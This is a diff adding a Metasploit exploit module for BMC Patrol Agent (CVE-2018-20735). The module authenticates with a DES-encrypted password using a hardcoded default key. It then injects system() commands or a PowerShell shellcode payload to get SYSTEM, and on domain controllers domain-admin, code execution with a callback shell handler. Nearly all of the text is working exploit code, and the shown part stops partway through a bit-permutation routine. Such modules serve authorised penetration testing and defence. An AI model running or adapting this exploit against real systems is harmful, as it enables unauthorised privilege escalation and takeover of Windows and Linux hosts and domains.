diff --git a/exploits/multiple/remote/46556.rb b/exploits/multiple/remote/46556.rb new file mode 100755 index 000000000..fbcca456a --- /dev/null +++ b/exploits/multiple/remote/46556.rb @@ -0,0 +1,1133 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Powershell + + @deflater = nil + @inflater = nil + + SBOXES = [ + 0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0, + 0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000, + 0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000, + 0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000, + 0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0, + 0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002, + 0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800, + 0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000, + 0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002, + 0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000, + 0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002, + 0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004, + 0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000, + 0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004, + 0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000, + 0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004, + 0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 0x2200000, 0x0, 0x4, 0x0, + 0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004, + 0x1100000, 0x0, 0x1100000, 0x4, 0x0, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004, + 0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004, + 0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004, + 0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000, + 0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0, + 0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400, + 0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000, + 0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400, + 0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0, + 0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400, + 0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000, + 0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000, + 0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001, + 0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001, + 0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001, + 0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001, + 0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000, + 0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000, + 0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002, + 0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000, + 0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40002, 0x0, 0x2, 0x40002, + 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000, + 0x0, 0x40002, 0x40002, 0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002, + 0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110, + 0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000, + 0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000, + 0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110, + 0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000, + 0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000, + 0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110, + 0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110, + 0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0, + 0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008, + 0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000, + 0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000, + 0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000, + 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110, + 0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 0x80110, 0x80000, 0x0, 0x80000, + 0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110, + 0x0, 0x0, 0x80110, 0x110, 0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110, + 0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110, + 0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110, + 0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000, + 0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000, + 0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000, + 0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008, + 0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800, + 0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000, + 0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800, + 0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801, + 0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1, + 0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800, + 0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400, + 0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400, + 0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000, + 0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400, + 0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000, + 0x8000220, 0x0, 0x8000000, 0x220, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, + 0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220, + 0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220, + 0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220, + 0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220, + 0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000, + 0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220, + 0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000, + 0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0, + 0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220 + ].freeze + + PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\ + "\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\ + "\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\ + "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze + + PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\ + "\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\ + "\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\ + "\x23\x1C\x1F".freeze + + SBOX_BYTE_ORDER = [ + 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, + 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, + 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, + 0x40000000, 0x80000000 + ].freeze + + ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze + INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze + INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze + + DES_ENCRYPT = 0 + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution', + 'Description' => %q( + This module leverages the remote command execution feature provided by + the BMC Patrol Agent software. It can also be used to escalate privileges + on Windows hosts as the software runs as SYSTEM but only verfies that the password + of the provided user is correct. This also means if the software is running on a + domain controller, it can be used to escalate from a normal domain user to domain + admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses + powershell to execute the payload. The powershell version tends to timeout on + the first run so it may take multiple tries. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'b0yd' # @rwincey / Vulnerability Discovery and MSF module author + ], + 'References' => + [ + ['CVE', '2018-20735'], + ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/'] + ], + 'Platform' => ['win', 'linux'], + 'Targets' => + [ + [ + 'Windows Powershell Injected Shellcode', { + 'Platform' => 'win' + } + ], + [ + 'Generic Command Callback', { + 'Arch' => ARCH_CMD, + 'Platform' => %w[linux unix win] + } + ] + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'DisablePayloadHandler' => true + }, + 'DisclosureDate' => 'Jan 17 2019')) + + register_options( + [ + Opt::RPORT(3181), + OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']), + OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']), + OptString.new('CMD', [false, 'command to run on the target. If this option is specified the payload will be ignored.']) + ] + ) + + end + + def cleanup + disconnect + print_status("Disconnected from BMC Patrol Agent.") + @inflater.close + @deflater.close + super + end + + def get_target_os(srv_info_msg) + lines = srv_info_msg.split("\n") + fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}" + + os = nil + ver = nil + lines[2..-2].each do |i| + val = i.split("=") + if val.length == 2 + if val[0].strip! == "T" + os = val[1] + elsif val[0].strip! == "VER" + ver = val[1] + end + end + end + [os, ver] + end + + def get_cmd_output(cmd_output_msg) + + lines = cmd_output_msg.split("\n") + fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}" + + # Parse out command results + idx_start = cmd_output_msg.index("Result\x00") + idx_end = cmd_output_msg.index("RemPsl_user") + output = cmd_output_msg[idx_start + 7..idx_end - 1] + + output + end + + def exploit + + # Manually start the handler if not running a single command + if datastore['CMD'].nil? || datastore['CMD'].empty? + + # Set to nil if the cmd is empty for checks further down + datastore['CMD'] = nil + datastore['DisablePayloadHandler'] = false + + # Configure the payload handler + payload_instance.exploit_config = { + 'active_timeout' => 300 + } + # Setup the payload handler + payload_instance.setup_handler + + # Start the payload handler + payload_instance.start_handler + + end + + # Initialize zlib objects + @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY) + @inflater = Zlib::Inflate.new + + # Connect to the BMC Patrol Agent + connect + print_status("Connected to BMC Patrol Agent.") + + # Create session msg + create_session + ret_data = receive_msg + fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil? + + # Authenticate + authenticate_user(datastore['USER'], datastore['PASSWORD']) + + # Receive the authentication response + ret_data = receive_msg + fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil? + + ret_msg = process_response(ret_data) + if ret_msg =~ /logged in/ + print_status("Successfully authenticated user.") + else + fail_with(Failure::UnexpectedReply, "Login failed. Aborting.") + end + + # Receive the server info + ret_data = receive_msg + fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil? + srv_info = process_response(ret_data) + + # Get the target's OS from their info msg + target_os = get_target_os(srv_info) + + # When using autotargeting, MSF selects the Windows meterpreter as the default payload. + # Fail if this is the case and ask the user to select an appropriate payload. + if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil? + fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") + end + + target_name = target.name + if !datastore['CMD'].nil? + command = datastore['CMD'].tr('"', '\"') + print_status("Command to execute: #{command}") + elsif target_name == 'Windows Powershell Injected Shellcode' + # Get encoded powershell of payload + command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection') + else + command = payload.raw.tr('"', '\"') + end + + # Run command + run_cmd(command) + + # Receive command confirmation + ret_data = receive_msg + if !ret_data.nil? + process_response(ret_data) + end + + # Receive command output + ret_data = receive_msg + if !ret_data.nil? && !datastore['CMD'].nil? + cmd_result_data = process_response(ret_data) + cmd_result = get_cmd_output(cmd_result_data) + print_status("Output:\n#{cmd_result}") + end + + # Handle the shell + handler + + end + + def receive_msg + + header = sock.get_once(6) + if header.nil? + return + end + + payload_size_arr = header[0, 4] + payload_size = payload_size_arr.unpack1("N") + payload = '' + if payload_size > 0 + payload = sock.get_once(payload_size) + if payload.nil? + return + end + end + + return header + payload + + end + + def send_msg(type, compression, data) + + data_len = data.length + buf = [data_len].pack('N') + + # Set the type + buf += [type].pack('C') + + # Set compression flag + buf += [compression].pack('C') + + # Add data + buf += data + + # Send msg + sock.put(buf) + + end + + def process_response(ret_data) + + # While style checks complain, I intend to leave this parsing + # in place for debugging purposes + ret_size_arr = ret_data[0, 4] + ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment + + msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment + comp_flag = ret_data[5, 1] + + payload_data = ret_data[6..-1] + if comp_flag == "\x00" + bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment + payload_data = @inflater.inflate(payload_data) + end + + return payload_data + + end + + def run_cmd(cmd) + + user_num = rand 1000..9999 + msg_1 = %(R_E +{ +\tRE_ID=1 +\tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num} +\tRE_ORG=PemApi +\tRE_SEV=1 +\tRE_NSEV=5 +\tRE_ST= +} +) + + msg_1 += "\x00" + # Compress the message + comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH + send_msg(0x44, 0x0, comp_data) + + end + + def identify(user) + + inner_len = 15 + msg_type = 8 + len_str = [inner_len].pack("N") + msg_str = [msg_type].pack("N") + msg_1 = %(PEM_MSG +{ +\tNSDL=#{inner_len} +\tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00 +} +) + msg_1 += "\x00" + print_status("Msg: #{msg_1}") + bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment + # Compress the message + comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH + send_msg(0x44, 0x0, comp_data) + + end + + def create_session + sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00" + sess_msg += "\x00" * 0x68 + send_msg(0x45, 0x2, sess_msg) + end + + def authenticate_user(user, password) + # Default encryption key + enc_key = 'k$C4}@"_' + output_data = des_crypt_func(password, enc_key, DES_ENCRYPT) + # Convert to hex string + encrpted_pw = output_data.unpack1("H*") + des_pw = encrpted_pw.upcase + + msg_1 = %(ID +{ +\tHOST=user +\tUSER=#{user} +\tPASS=#{des_pw} +\tVER=V9.6.00 +\tT=PEMAPI +\tHTBT=1 +\tTMOT=1728000 +\tRTRS=3 +} +) + + msg_1 += "\x00" + comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH + send_msg(0x44, 0x0, comp_data) + + end + + def rotate_block_init(input_block_tuple) + + v6 = 0 + v5 = 0 + input_block_tuple = input_block_tuple.pack("V*").unpack("i*") + v3 = input_block_tuple[0] + v4 = input_block_tuple[1] + + if (v4 & 0x2000000) != 0 + v5 = 1 + end + if (v4 & 0x20000) != 0 + v5 |= 2 + end + if (v4 & 0x200) != 0 + v5 |= 4 + end + if (v4 & 2) != 0 + v5 |= 8 + end + if (v3 & 0x2000000) != 0 + v5 |= 0x10 + end + if (v3 & 0x20000) != 0 + v5 |= 0x20 + end + if (v3 & 0x200) != 0 + v5 |= 0x40 + end + if (v3 & 2) != 0 + v5 |= 0x80 + end + if (v4 & 0x8000000) != 0 + v5 |= 0x100 + end + if (v4 & 0x80000) != 0 + v5 |= 0x200 + end + if (v4 & 0x800) != 0 + v5 |= 0x400 + end + if (v4 & 8) != 0 + v5 |= 0x800 + end + if (v3 & 0x8000000) != 0 + v5 |= 0x1000 + end + if (v3 & 0x80000) != 0 + v5 |= 0x2000 + end + if (v3 & 0x800) != 0 + v5 |= 0x4000 + end + if (v3 & 8) != 0 + v5 |= 0x8000 + end + if (v4 & 0x20000000) != 0 + v5 |= 0x10000 + end + if (v4 & 0x200000) != 0 + v5 |= 0x20000 + end + if (v4 & 0x2000) != 0 + v5 |= 0x40000 + end + if (v4 & 0x20) != 0 + v5 |= 0x80000 + end + if (v3 & 0x20000000) != 0 + v5 |= 0x100000 + end + if (v3 & 0x200000) != 0 + v5 |= 0x200000 + end + if (v3 & 0x2000) != 0 + v5 |= 0x400000 + end + if (v3 & 0x20) != 0 + v5 |= 0x800000 + end + if (v4 < 0) + v5 |= 0x1000000 + end + if (v4 & 0x800000) != 0 + v5 |= 0x2000000 + end + if (v4 & 0x8000) != 0 + v5 |= 0x4000000 + end + if (v4 & 0x80) != 0 + v5 |= 0x8000000 + end + if (v3 < 0) + v5 |= 0x10000000 + end + if (v3 & 0x800000) != 0 + v5 |= 0x20000000 + end + if (v3 & 0x8000) != 0 + v5 |= 0x40000000 + end + if (v3 & 0x80) != 0 + v5 |= 0x80000000 + end + if (v4 & 0x1000000) != 0 + v6 = 1 + end + if (v4 & 0x10000) != 0 + v6 |= 2 + end + if (v4 & 0x100) != 0 + v6 |= 4 + end + if (v4 & 1) != 0 + v6 |= 8 + end + if (v3 & 0x1000000) != 0 + v6 |= 0x10 + end + if (v3 & 0x10000) != 0 + v6 |= 0x20 + end + if (v3 & 0x100) != 0 + v6 |= 0x40 + end + if (v3 & 1) != 0 + v6 |= 0x80 + end + if (v4 & 0x4000000) != 0 + v6 |= 0x100 + end + if (v4 & 0x40000) != 0 + v6 |= 0x200 + end + if (v4 & 0x400) != 0 + v6 |= 0x400 + end + if (v4 & 4) != 0 + v6 |= 0x800 + end + if (v3 & 0x4000000) != 0 + v6 |= 0x1000 + end + if (v3 & 0x40000) != 0 + v6 |= 0x2000 + end + if (v3 & 0x400) != 0 + v6 |= 0x4000 + end + if (v3 & 4) != 0 + v6 |= 0x8000 + end + if (v4 & 0x10000000) != 0 + v6 |= 0x10000 + end + if (v4 & 0x100000) != 0 + v6 |= 0x20000 + end + if (v4 & 0x1000) != 0 + v6 |= 0x40000 + end + if (v4 & 0x10) != 0 + v6 |= 0x80000 + end + if (v3 & 0x10000000) != 0 + v6 |= 0x100000 + end + if (v3 & 0x100000) != 0 + v6 |= 0x200000 + end + if (v3 & 0x1000) != 0 + v6 |= 0x400000 + end + if (v3 & 0x10) != 0 + v6 |= 0x800000 + end + if (v4 & 0x40000000) != 0 + v6 |= 0x1000000 + end + if (v4 & 0x400000) != 0 + v6 |= 0x2000000 + end + if (v4 & 0x4000) != 0 + v6 |= 0x4000000 + end + if (v4 & 0x40) != 0 + v6 |= 0x8000000 + end + if (v3 & 0x40000000) != 0 + v6 |= 0x10000000 + end + if (v3 & 0x400000) != 0 + v6 |= 0x20000000 + end + if (v3 & 0x4000) != 0 + v6 |= 0x40000000 + end + if (v3 & 0x40) != 0 + v6 |= 0x80000000 + end + + # Create return tuple + ret_block = Array.new + ret_block.push v5 + ret_block.push v6 + ret_block + end + + def rotate_block_final(input_block_tuple) + + v6 = 0 + v5 = 0 + input_block_tuple = input_block_tuple.pack("V*").unpack("i*") + v3 = input_block_tuple[0] + v4 = input_block_tuple[1] + + if (v4 & 0x80) != 0 + v5 = 1 + end + if (v3 & 0x80) != 0 + v5 |= 2 + end + if (v4 & 0x8000) != 0 + v5 |= 4 + end + if (v3 & 0x8000) != 0 + v5 |= 8 + end + if (v4 & 0x800000) != 0 + v5 |= 0x10 + end + if (v3 & 0x800000) != 0 + v5 |= 0x20 + end + if (v4 < 0) + v5 |= 0x40 + end + if (v3 < 0) + v5 |= 0x80 + end + if (v4 & 0x40) != 0 + v5 |= 0x100 + end + if (v3 & 0x40) != 0 + v5 |= 0x200 + end + if (v4 & 0x4000) != 0 + v5 |= 0x400 + end + if (v3 & 0x4000) != 0 + v5 |= 0x800 + end + if (v4 & 0x400000) != 0 + v5 |= 0x1000 + end + if (v3 & 0x400000) != 0 + v5 |= 0x2000 + end + if (v4 & 0x40000000) != 0 + v5 |= 0x4000 + end + if (v3 & 0x40000000) != 0 + v5 |= 0x8000 + end + if (v4 & 0x20) != 0 + v5 |= 0x10000 + end + if (v3 & 0x20) != 0 + v5 |= 0x20000 + end + if (v4 & 0x2000) != 0 + v5 |= 0x40000 + end + if (v3 & 0x2000) != 0 + v5 |= 0x80000 + end + if (v4 & 0x200000) != 0 + v5 |= 0x100000 + end + if (v3 & 0x200000) != 0 + v5 |= 0x200000 + end + if (v4 & 0x20000000) != 0 + v5 |= 0x400000 + end + if (v3 & 0x20000000) != 0 + v5 |= 0x800000 + end + if (v4 & 0x10) != 0 + v5 |= 0x1000000 + end + if (v3 & 0x10) != 0 + v5 |= 0x2000000 + end + if (v4 & 0x1000) != 0 + v5 |= 0x4000000 + end + if (v3 & 0x1000) != 0 + v5 |= 0x8000000 + end + if (v4 & 0x100000) != 0 + v5 |= 0x10000000 + end + if (v3 & 0x100000) != 0 + v5 |= 0x20000000 + end + if (v4 & 0x10000000) != 0 + v5 |= 0x40000000 + end + if (v3 & 0x10000000) != 0 + v5 |= 0x80000000 + end + if (v4 & 8) != 0 + v6 = 1 + end + if (v3 & 8) != 0 + v6 |= 2 + end + if (v4 & 0x800) != 0 + v6 |= 4 + end + if (v3 & 0x800) != 0 + v6 |= 8 + end + if (v4 & 0x80000) != 0 + v6 |= 0x10 + end + if (v3 & 0x80000) != 0 + v6 |= 0x20 + end + if (v4 & 0x8000000) != 0 + v6 |= 0x40 + end + if (v3 & 0x8000000) != 0 + v6 |= 0x80 + end + if (v4 & 4) != 0 + v6 |= 0x100 + end + if (v3 & 4) != 0 + v6 |= 0x200 + end + if (v4 & 0x400) != 0 + v6 |= 0x400 + end + if (v3 & 0x400) != 0 + v6 |= 0x800 + end + if (v4 & 0x40000) != 0 + v6 |= 0x1000 + end + if (v3 & 0x40000) != 0 + v6 |= 0x2000 + end + if (v4 & 0x4000000) != 0 + v6 |= 0x4000 + end + if (v3 & 0x4000000) != 0 + v6 |= 0x8000 + end + if (v4 & 2) != 0 + v6 |= 0x10000 + end + if (v3 & 2) != 0 + v6 |= 0x20000 + end + if (v4 & 0x200) != 0 + v6 |= 0x40000 + end + if (v3 & 0x200) != 0 + v6 |= 0x80000 + end + if (v4 & 0x20000) != 0 + v6 |= 0x100000 + end + if (v3 & 0x20000) != 0 + v6 |= 0x200000 + end + if (v4 & 0x2000000) != 0 + v6 |= 0x400000 + end + if (v3 & 0x2000000) != 0 + v6 |= 0x800000 + end + if (v4 & 1) != 0 + v6 |= 0x1000000 + end + if (v3 & 1) != 0 + v6 |= 0x2000000 + end + if (v4 & 0x100) != 0 + v6 |= 0x4000000 + end + if (v3 & 0x100) != 